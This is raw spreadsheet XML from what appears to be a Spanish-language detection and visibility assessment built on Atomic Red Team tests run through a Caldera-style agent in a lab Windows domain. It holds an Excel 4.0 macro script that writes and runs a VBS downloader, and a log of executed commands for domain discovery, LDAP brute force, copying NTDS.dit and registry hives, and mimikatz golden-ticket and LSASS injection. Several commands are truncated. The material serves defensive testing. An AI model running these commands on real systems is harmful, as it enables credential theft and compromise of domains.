    <t>$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"; $fname1 = "$env:TEMP\procexp.exe"; if (Test-Path $fname) {;   Remove-Item $fname;   Remove-Item $fname1; }; $xlApp = New-Object -COMObject "Excel.Application"; $xlApp.Visible = $True; $xlApp.DisplayAlerts = $False; $xlBook = $xlApp.Workbooks.Add(); $sheet = $xlBook.Excel4MacroSheets.Add(); if ("$env:Username" -ne "") {;   $sheet.Cells.Item(1,1) = "$env:Username"; } else {;   $sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"; }; $sheet.Cells.Item(2,1) = "procexp.exe"; $sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"; $sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"; $sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&amp;A1&amp;`"\AppData\Local\Temp\`"&amp;A3&amp;`"`", 3)"; $sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"https://live.sysinternals.com/procexp.exe`"`"`")"; $sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"; $sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"; $sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"; $sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"; $sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"; $sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"; $sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"; $sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"; $sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"; $sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&amp;A1&amp;`"\AppData\Local\Temp\`"&amp;A2&amp;`"`"`", 2`")"; $sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"; $sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"; $sheet.Cells.Item(19,1) = "=FCLOSE(A5)"; $sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&amp;A1&amp;`"\AppData\Local\Temp\`"&amp;A3&amp;`"`")"; $sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"; $sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&amp;A1&amp;`"\AppData\Local\Temp\`"&amp;A2&amp;`"`")"; $sheet.Cells.Item(23,1) = "=HALT()"; $sheet.Cells.Item(1,1).Name = "runme"; $xlApp.Run("runme"); $xlApp.Quit(); [System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null; [System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null; [System.GC]::Collect(); [System.GC]::WaitForPendingFinalizers(); Remove-Variable xlBook; Remove-Variable xlApp</t>
  </si>
  <si>
    <t>%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! &gt; hello.txt &amp; type hello.txt</t>
  </si>
  <si>
    <t>ejecutor</t>
  </si>
  <si>
    <t>Limpieza</t>
  </si>
  <si>
    <t>del %temp%\bitsadmin3_flag.ps1 &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>SCHTASKS /Delete /TN spawn /F &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>$p=Tasklist /svc /fi "IMAGENAME eq mstsc.exe" /fo csv | convertfrom-csv; if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }</t>
  </si>
  <si>
    <t>net user /del "T1136.001_Admin" &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>net user "T1136.002_Admin" &gt;nul 2&gt;&amp;1 /del /domain</t>
  </si>
  <si>
    <t>reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>$list = Get-LocalUser |?{$_.Description -like "atr:*"}; foreach($u in $list) {;   $u.Description -match "atr:(?&lt;Name&gt;[^;]+);(?&lt;Description&gt;.*)";   Set-LocalUser -Name $u.Name -Description $Matches.Description;   Rename-LocalUser -Name $u.Name -NewName $Matches.Name;   Write-Host "Successfully Reverted Account $($u.Name) to $($Matches.Name) on " $Env:COMPUTERNAME; }</t>
  </si>
  <si>
    <t>reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /f &gt;nul 2&gt;&amp;1 &amp;&amp; reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /f &gt;nul 2&gt;&amp;1 &amp;&amp; reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /f &gt;nul 2&gt;&amp;1 &amp;&amp; reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /f &gt;nul 2&gt;&amp;1 &amp;&amp; reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /f &gt;nul 2&gt;&amp;1 &amp;&amp; reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /f &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>net.exe start spooler &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>sc.exe start spooler &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -Force -ErrorAction Ignore; Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -Force -ErrorAction Ignore ; Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -Force -ErrorAction Ignore; Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -Force -ErrorAction Ignore; Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -Force -ErrorAction Ignore; Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force -ErrorAction Ignore</t>
  </si>
  <si>
    <t>Stop-Process -name PotentiallyUnwanted; Remove-Item $env:TEMP/PotentiallyUnwanted.exe -ErrorAction Ignore</t>
  </si>
  <si>
    <t>Stop-Process -Name "procexp*" -ErrorAction Ignore; Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore; Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore</t>
  </si>
  <si>
    <t>$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | select-object -expandproperty DeviceID; ForEach ($Drive in $RemovableDrives); {; Remove-Item -Path $Drive\T1091Test1.txt -Force -ErrorAction Ignore; }</t>
  </si>
  <si>
    <t>Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore</t>
  </si>
  <si>
    <t>wevtutil sl "Microsoft-Windows-IKE/Operational" /e:true</t>
  </si>
  <si>
    <t>del %temp%\T1140_calc.txt &gt;nul 2&gt;&amp;1 &amp;&amp; del %temp%\T1140_calc_decoded.exe &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Remove-Item -Path "\\127.0.0.1\C$\Windows\temp\Easter_Bunny.password"; Remove-Item -Path "$Env:TEMP\Easter_egg.password"</t>
  </si>
  <si>
    <t>del \\127.0.0.1\C$\Windows\temp\Easter_Bunny.password &amp;&amp; del %TEMP%\Easter_egg.password</t>
  </si>
  <si>
    <t>reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /f &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>reg delete HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ImmersiveShell /v UseActionCenterExperience /f &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system" -Name DisableRegistryTools -ErrorAction Ignore</t>
  </si>
  <si>
    <t>sysmon -i -accepteula &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Remove-NetEventSession -Name "PCAP";Remove-Item $ENV:UserProfile\Desktop\pcap.etl;</t>
  </si>
  <si>
    <t>netsh trace stop &gt;nul 2&gt;&amp;1 &amp;&amp; TIMEOUT /T 5 &gt;nul 2&gt;&amp;1 &amp;&amp; del %temp%\trace.etl &gt;nul 2&gt;&amp;1 &amp;&amp; del %temp%\trace.cab &gt;nul 2&gt;&amp;1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</si>
</sst>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onmcsec.sharepoint.com/sites/ProyectosPTRTBT/Shared%20Documents/MCSec_Audi_Self-assesment%20Atomic/2.%20Trabajo/Plantillas%20de%20informes/Deteccion_Visibilida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ciones"/>
      <sheetName val="SalidaCaldera"/>
      <sheetName val="NombreHost"/>
      <sheetName val="Discovery"/>
      <sheetName val="Datos - Descripciones"/>
      <sheetName val="Dinamico deteccion-visibilidad"/>
      <sheetName val="CalculoparaJSON"/>
      <sheetName val="CambiosParaScript"/>
      <sheetName val="Resultados"/>
    </sheetNames>
    <sheetDataSet>
      <sheetData sheetId="0"/>
      <sheetData sheetId="1"/>
      <sheetData sheetId="2">
        <row r="1">
          <cell r="A1" t="str">
            <v>paw</v>
          </cell>
          <cell r="B1" t="str">
            <v>Dirección IP</v>
          </cell>
        </row>
        <row r="2">
          <cell r="A2" t="str">
            <v>lxrqhh</v>
          </cell>
          <cell r="B2" t="str">
            <v>192.168.56.104 - 192.168.15.8 - 169.254.9.170</v>
          </cell>
        </row>
        <row r="3">
          <cell r="A3" t="str">
            <v>hxtqia</v>
          </cell>
          <cell r="B3" t="str">
            <v>192.168.15.6 - 169.254.177.51</v>
          </cell>
        </row>
        <row r="4">
          <cell r="A4" t="str">
            <v>rockus</v>
          </cell>
          <cell r="B4" t="str">
            <v>192.168.56.104 - 192.168.15.8 - 169.254.51.178</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="3">
        <row r="1">
          <cell r="A1" t="str">
            <v>Link/Ability Name</v>
          </cell>
          <cell r="B1" t="str">
            <v>Decide</v>
          </cell>
          <cell r="C1" t="str">
            <v>Link/Ability Name</v>
          </cell>
          <cell r="D1" t="str">
            <v>Agent #paw</v>
          </cell>
          <cell r="E1" t="str">
            <v>Host</v>
          </cell>
          <cell r="F1" t="str">
            <v>pid</v>
          </cell>
          <cell r="G1" t="str">
            <v>Command</v>
          </cell>
        </row>
        <row r="2">
          <cell r="A2" t="str">
            <v>Adfind - Enumerate Active Directory Admins</v>
          </cell>
          <cell r="B2" t="str">
            <v>2022-11-30T17:39:42Z</v>
          </cell>
          <cell r="C2" t="str">
            <v>Adfind - Enumerate Active Directory Admins</v>
          </cell>
          <cell r="D2" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E2" t="str">
            <v>win10</v>
          </cell>
          <cell r="F2">
            <v>1972</v>
          </cell>
          <cell r="G2" t="str">
            <v>12011c_AdFind.exe -sc admincountdmp</v>
          </cell>
        </row>
        <row r="3">
          <cell r="A3" t="str">
            <v>Adfind - Enumerate Active Directory Trusts</v>
          </cell>
          <cell r="B3" t="str">
            <v>2022-11-30T17:40:07Z</v>
          </cell>
          <cell r="C3" t="str">
            <v>Adfind - Enumerate Active Directory Trusts</v>
          </cell>
          <cell r="D3" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E3" t="str">
            <v>win10</v>
          </cell>
          <cell r="F3">
            <v>6232</v>
          </cell>
          <cell r="G3" t="str">
            <v>12011c_AdFind.exe -gcb -sc trustdmp</v>
          </cell>
        </row>
        <row r="4">
          <cell r="A4" t="str">
            <v>Adfind - Enumerate Active Directory Exchange AD Objects</v>
          </cell>
          <cell r="B4" t="str">
            <v>2022-11-30T17:40:47Z</v>
          </cell>
          <cell r="C4" t="str">
            <v>Adfind - Enumerate Active Directory Exchange AD Objects</v>
          </cell>
          <cell r="D4" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E4" t="str">
            <v>win10</v>
          </cell>
          <cell r="F4">
            <v>5372</v>
          </cell>
          <cell r="G4" t="str">
            <v>12011c_AdFind.exe -sc exchaddresses</v>
          </cell>
        </row>
        <row r="5">
          <cell r="A5" t="str">
            <v>Adfind - Enumerate Active Directory Domain Controller Objects</v>
          </cell>
          <cell r="B5" t="str">
            <v>2022-11-30T17:41:47Z</v>
          </cell>
          <cell r="C5" t="str">
            <v>Adfind - Enumerate Active Directory Domain Controller Objects</v>
          </cell>
          <cell r="D5" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E5" t="str">
            <v>win10</v>
          </cell>
          <cell r="F5">
            <v>8032</v>
          </cell>
          <cell r="G5" t="str">
            <v>12011c_AdFind.exe -sc dclist</v>
          </cell>
        </row>
        <row r="6">
          <cell r="A6" t="str">
            <v>Enumerate Active Directory Groups with Get-AdGroup</v>
          </cell>
          <cell r="B6" t="str">
            <v>2022-11-30T17:42:32Z</v>
          </cell>
          <cell r="C6" t="str">
            <v>Enumerate Active Directory Groups with Get-AdGroup</v>
          </cell>
          <cell r="D6" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E6" t="str">
            <v>win10</v>
          </cell>
          <cell r="F6">
            <v>4920</v>
          </cell>
          <cell r="G6" t="str">
            <v>Get-AdGroup -Filter *</v>
          </cell>
        </row>
        <row r="7">
          <cell r="A7" t="str">
            <v>Adfind -Listing password policy</v>
          </cell>
          <cell r="B7" t="str">
            <v>2022-11-30T17:43:38Z</v>
          </cell>
          <cell r="C7" t="str">
            <v>Adfind -Listing password policy</v>
          </cell>
          <cell r="D7" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E7" t="str">
            <v>win10</v>
          </cell>
          <cell r="F7">
            <v>6552</v>
          </cell>
          <cell r="G7" t="str">
            <v>12011c_AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties</v>
          </cell>
        </row>
        <row r="8">
          <cell r="A8" t="str">
            <v>Discover local hosts</v>
          </cell>
          <cell r="B8" t="str">
            <v>2022-11-30T17:44:28Z</v>
          </cell>
          <cell r="C8" t="str">
            <v>Discover local hosts</v>
          </cell>
          <cell r="D8" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E8" t="str">
            <v>win10</v>
          </cell>
          <cell r="F8">
            <v>5136</v>
          </cell>
          <cell r="G8" t="str">
            <v>Import-Module .\powerview.ps1;Get-DomainComputer</v>
          </cell>
        </row>
        <row r="9">
          <cell r="A9" t="str">
            <v>Discover Domain Admins</v>
          </cell>
          <cell r="B9" t="str">
            <v>2022-11-30T17:45:28Z</v>
          </cell>
          <cell r="C9" t="str">
            <v>Discover Domain Admins</v>
          </cell>
          <cell r="D9" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E9" t="str">
            <v>win10</v>
          </cell>
          <cell r="F9">
            <v>6264</v>
          </cell>
          <cell r="G9" t="str">
            <v>Import-Module .\powerview.ps1;Get-NetLocalGroupMember -ComputerName exchange.windomain.local</v>
          </cell>
        </row>
        <row r="10">
          <cell r="A10" t="str">
            <v>Discover Domain Admins</v>
          </cell>
          <cell r="B10" t="str">
            <v>2022-11-30T17:46:38Z</v>
          </cell>
          <cell r="C10" t="str">
            <v>Discover Domain Admins</v>
          </cell>
          <cell r="D10" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E10" t="str">
            <v>win10</v>
          </cell>
          <cell r="F10">
            <v>4828</v>
          </cell>
          <cell r="G10" t="str">
            <v>Import-Module .\powerview.ps1;Get-NetLocalGroupMember -ComputerName win10.windomain.local</v>
          </cell>
        </row>
        <row r="11">
          <cell r="A11" t="str">
            <v>Discover Domain Admins</v>
          </cell>
          <cell r="B11" t="str">
            <v>2022-11-30T17:46:48Z</v>
          </cell>
          <cell r="C11" t="str">
            <v>Discover Domain Admins</v>
          </cell>
          <cell r="D11" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E11" t="str">
            <v>win10</v>
          </cell>
          <cell r="F11">
            <v>4636</v>
          </cell>
          <cell r="G11" t="str">
            <v>Import-Module .\powerview.ps1;Get-NetLocalGroupMember -ComputerName wef.windomain.local</v>
          </cell>
        </row>
        <row r="12">
          <cell r="A12" t="str">
            <v>Discover Domain Admins</v>
          </cell>
          <cell r="B12" t="str">
            <v>2022-11-30T17:47:48Z</v>
          </cell>
          <cell r="C12" t="str">
            <v>Discover Domain Admins</v>
          </cell>
          <cell r="D12" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E12" t="str">
            <v>win10</v>
          </cell>
          <cell r="F12">
            <v>7768</v>
          </cell>
          <cell r="G12" t="str">
            <v>Import-Module .\powerview.ps1;Get-NetLocalGroupMember -ComputerName dc.windomain.local</v>
          </cell>
        </row>
        <row r="13">
          <cell r="A13" t="str">
            <v>Enumerate Active Directory Computers with Get-AdComputer</v>
          </cell>
          <cell r="B13" t="str">
            <v>2022-11-30T17:48:28Z</v>
          </cell>
          <cell r="C13" t="str">
            <v>Enumerate Active Directory Computers with Get-AdComputer</v>
          </cell>
          <cell r="D13" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E13" t="str">
            <v>win10</v>
          </cell>
          <cell r="F13">
            <v>5808</v>
          </cell>
          <cell r="G13" t="str">
            <v>Get-AdComputer -Filter *</v>
          </cell>
        </row>
        <row r="14">
          <cell r="A14" t="str">
            <v>Get-wmiobject to Enumerate Domain Controllers</v>
          </cell>
          <cell r="B14" t="str">
            <v>2022-11-30T17:49:04Z</v>
          </cell>
          <cell r="C14" t="str">
            <v>Get-wmiobject to Enumerate Domain Controllers</v>
          </cell>
          <cell r="D14" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E14" t="str">
            <v>win10</v>
          </cell>
          <cell r="F14">
            <v>7696</v>
          </cell>
          <cell r="G14" t="str">
            <v>get-wmiobject -class ds_computer -namespace root\directory\ldap</v>
          </cell>
        </row>
        <row r="15">
          <cell r="A15" t="str">
            <v>Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy</v>
          </cell>
          <cell r="B15" t="str">
            <v>2022-11-30T17:50:04Z</v>
          </cell>
          <cell r="C15" t="str">
            <v>Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy</v>
          </cell>
          <cell r="D15" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E15" t="str">
            <v>win10</v>
          </cell>
          <cell r="F15">
            <v>4404</v>
          </cell>
          <cell r="G15" t="str">
            <v>get-addefaultdomainpasswordpolicy</v>
          </cell>
        </row>
        <row r="16">
          <cell r="A16" t="str">
            <v>Enumerate Root Domain linked policies Discovery</v>
          </cell>
          <cell r="B16" t="str">
            <v>2022-11-30T17:50:59Z</v>
          </cell>
          <cell r="C16" t="str">
            <v>Enumerate Root Domain linked policies Discovery</v>
          </cell>
          <cell r="D16" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E16" t="str">
            <v>win10</v>
          </cell>
          <cell r="F16">
            <v>8044</v>
          </cell>
          <cell r="G16" t="str">
            <v>(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="A17" t="str">
            <v>Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)</v>
          </cell>
          <cell r="B17" t="str">
            <v>2022-11-30T17:51:39Z</v>
          </cell>
          <cell r="C17" t="str">
            <v>Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)</v>
          </cell>
          <cell r="D17" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E17" t="str">
            <v>win10</v>
          </cell>
          <cell r="F17">
            <v>1316</v>
          </cell>
          <cell r="G17" t="str">
            <v>if ("NTLM".ToLower() -NotIn @("ntlm"</v>
          </cell>
        </row>
        <row r="18">
          <cell r="A18" t="str">
            <v>Copy NTDS.dit from Volume Shadow Copy</v>
          </cell>
          <cell r="B18" t="str">
            <v>2022-11-30T17:52:19Z</v>
          </cell>
          <cell r="C18" t="str">
            <v>Copy NTDS.dit from Volume Shadow Copy</v>
          </cell>
          <cell r="D18" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E18" t="str">
            <v>win10</v>
          </cell>
          <cell r="F18">
            <v>2540</v>
          </cell>
          <cell r="G18" t="str">
            <v>if not exist C:\Windows\Temp  ( call ) ELSE ( mkdir C:\Windows\Temp ) &amp;&amp;   &amp;&amp;  copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit &amp;&amp; copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\VSC_SYSTEM_HIVE &amp;&amp; reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM_HIVE</v>
          </cell>
        </row>
        <row r="19">
          <cell r="A19" t="str">
            <v>Create Symlink to Volume Shadow Copy</v>
          </cell>
          <cell r="B19" t="str">
            <v>2022-11-30T17:52:59Z</v>
          </cell>
          <cell r="C19" t="str">
            <v>Create Symlink to Volume Shadow Copy</v>
          </cell>
          <cell r="D19" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E19" t="str">
            <v>win10</v>
          </cell>
          <cell r="F19">
            <v>2372</v>
          </cell>
          <cell r="G19" t="str">
            <v>vssadmin.exe create shadow /for=C: &amp;&amp; mklink /D C:\Temp\vssstore \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1</v>
          </cell>
        </row>
        <row r="20">
          <cell r="A20" t="str">
            <v>Create Volume Shadow Copy with WMI</v>
          </cell>
          <cell r="B20" t="str">
            <v>2022-11-30T17:53:49Z</v>
          </cell>
          <cell r="C20" t="str">
            <v>Create Volume Shadow Copy with WMI</v>
          </cell>
          <cell r="D20" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E20" t="str">
            <v>win10</v>
          </cell>
          <cell r="F20">
            <v>7444</v>
          </cell>
          <cell r="G20" t="str">
            <v>wmic shadowcopy call create Volume=C:\</v>
          </cell>
        </row>
        <row r="21">
          <cell r="A21" t="str">
            <v>Create Volume Shadow Copy with Powershell</v>
          </cell>
          <cell r="B21" t="str">
            <v>2022-11-30T17:54:49Z</v>
          </cell>
          <cell r="C21" t="str">
            <v>Create Volume Shadow Copy with Powershell</v>
          </cell>
          <cell r="D21" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E21" t="str">
            <v>win10</v>
          </cell>
          <cell r="F21">
            <v>6312</v>
          </cell>
          <cell r="G21" t="str">
            <v>(gwmi -list win32_shadowcopy).Create('C:\'</v>
          </cell>
        </row>
        <row r="22">
          <cell r="A22" t="str">
            <v>Crafting Active Directory golden tickets with mimikatz</v>
          </cell>
          <cell r="B22" t="str">
            <v>2022-11-30T17:55:40Z</v>
          </cell>
          <cell r="C22" t="str">
            <v>Crafting Active Directory golden tickets with mimikatz</v>
          </cell>
          <cell r="D22" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E22" t="str">
            <v>win10</v>
          </cell>
          <cell r="F22">
            <v>1656</v>
          </cell>
          <cell r="G22" t="str">
            <v>Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore; Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore; $domain_sid = "S-1-5-21-DEFAULT"; If ($domain_sid -Match "DEFAULT") {;   $domain = gwmi Win32_ComputerSystem | Select -Expand Domain;   $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value;   $domain_sid = $krbtgtSID.SubString(0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="A23" t="str">
            <v>Remote Process Injection in LSASS via mimikatz</v>
          </cell>
          <cell r="B23" t="str">
            <v>2022-11-30T17:56:30Z</v>
          </cell>
          <cell r="C23" t="str">
            <v>Remote Process Injection in LSASS via mimikatz</v>
          </cell>
          <cell r="D23" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E23" t="str">
            <v>win10</v>
          </cell>
          <cell r="F23">
            <v>5868</v>
          </cell>
          <cell r="G23" t="str">
            <v>C:\PSTools\PsExec.exe /accepteula \\DC1 -c %tmp%\mimikatz\x64\mimikatz.exe "lsadump::lsa /inject /id:500" "exit"</v>
          </cell>
        </row>
        <row r="24">
          <cell r="A24" t="str">
            <v>Find OS Version</v>
          </cell>
          <cell r="B24" t="str">
            <v>2022-11-30T17:57:05Z</v>
          </cell>
          <cell r="C24" t="str">
            <v>Find OS Version</v>
          </cell>
          <cell r="D24" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E24" t="str">
            <v>win10</v>
          </cell>
          <cell r="F24">
            <v>4976</v>
          </cell>
          <cell r="G24" t="str">
            <v>[environment]::OSVersion.Version</v>
          </cell>
        </row>
        <row r="25">
          <cell r="A25" t="str">
            <v>Hostname Discovery (Windows)</v>
          </cell>
          <cell r="B25" t="str">
            <v>2022-11-30T17:58:05Z</v>
          </cell>
          <cell r="C25" t="str">
            <v>Hostname Discovery (Windows)</v>
          </cell>
          <cell r="D25" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E25" t="str">
            <v>win10</v>
          </cell>
          <cell r="F25">
            <v>4332</v>
          </cell>
          <cell r="G25" t="str">
            <v>hostname</v>
          </cell>
        </row>
        <row r="26">
          <cell r="A26" t="str">
            <v>System Information Discovery</v>
          </cell>
          <cell r="B26" t="str">
            <v>2022-11-30T17:58:55Z</v>
          </cell>
          <cell r="C26" t="str">
            <v>System Information Discovery</v>
          </cell>
          <cell r="D26" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E26" t="str">
            <v>win10</v>
          </cell>
          <cell r="F26">
            <v>1912</v>
          </cell>
          <cell r="G26" t="str">
            <v>systeminfo &amp;&amp; reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum</v>
          </cell>
        </row>
        <row r="27">
          <cell r="A27" t="str">
            <v>Remote System Discovery - arp</v>
          </cell>
          <cell r="B27" t="str">
            <v>2022-11-30T17:59:35Z</v>
          </cell>
          <cell r="C27" t="str">
            <v>Remote System Discovery - arp</v>
          </cell>
          <cell r="D27" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E27" t="str">
            <v>win10</v>
          </cell>
          <cell r="F27">
            <v>6764</v>
          </cell>
          <cell r="G27" t="str">
            <v>arp -a</v>
          </cell>
        </row>
        <row r="28">
          <cell r="A28" t="str">
            <v>Remote System Discovery - nslookup</v>
          </cell>
          <cell r="B28" t="str">
            <v>2022-11-30T18:00:35Z</v>
          </cell>
          <cell r="C28" t="str">
            <v>Remote System Discovery - nslookup</v>
          </cell>
          <cell r="D28" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E28" t="str">
            <v>win10</v>
          </cell>
          <cell r="F28">
            <v>3856</v>
          </cell>
          <cell r="G28" t="str">
            <v>$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]; $pieces = $localip.split("."); $firstOctet = $pieces[0]; $secondOctet = $pieces[1]; $thirdOctet = $pieces[2]; foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}</v>
          </cell>
        </row>
        <row r="29">
          <cell r="A29" t="str">
            <v>Remote System Discovery - net group Domain Computers</v>
          </cell>
          <cell r="B29" t="str">
            <v>2022-11-30T18:01:31Z</v>
          </cell>
          <cell r="C29" t="str">
            <v>Remote System Discovery - net group Domain Computers</v>
          </cell>
          <cell r="D29" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E29" t="str">
            <v>win10</v>
          </cell>
          <cell r="F29">
            <v>6320</v>
          </cell>
          <cell r="G29" t="str">
            <v>net group "Domain Computers" /domain</v>
          </cell>
        </row>
        <row r="30">
          <cell r="A30" t="str">
            <v>Port Scan NMap for Windows</v>
          </cell>
          <cell r="B30" t="str">
            <v>2022-11-30T18:02:16Z</v>
          </cell>
          <cell r="C30" t="str">
            <v>Port Scan NMap for Windows</v>
          </cell>
          <cell r="D30" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E30" t="str">
            <v>win10</v>
          </cell>
          <cell r="F30">
            <v>3476</v>
          </cell>
          <cell r="G30" t="str">
            <v>Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe https://nmap.org/dist/nmap-7.80-setup.exe;Start-Process $env:temp\nmap-7.80-setup.exe /S;nmap 127.0.0.1</v>
          </cell>
        </row>
        <row r="31">
          <cell r="A31" t="str">
            <v>Network Service Scanning</v>
          </cell>
          <cell r="B31" t="str">
            <v>2022-11-30T18:03:26Z</v>
          </cell>
          <cell r="C31" t="str">
            <v>Network Service Scanning</v>
          </cell>
          <cell r="D31" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E31" t="str">
            <v>win10</v>
          </cell>
          <cell r="F31">
            <v>7328</v>
          </cell>
          <cell r="G31" t="str">
            <v>Import-Module ./basic_scanner.ps1;$ports = @(22</v>
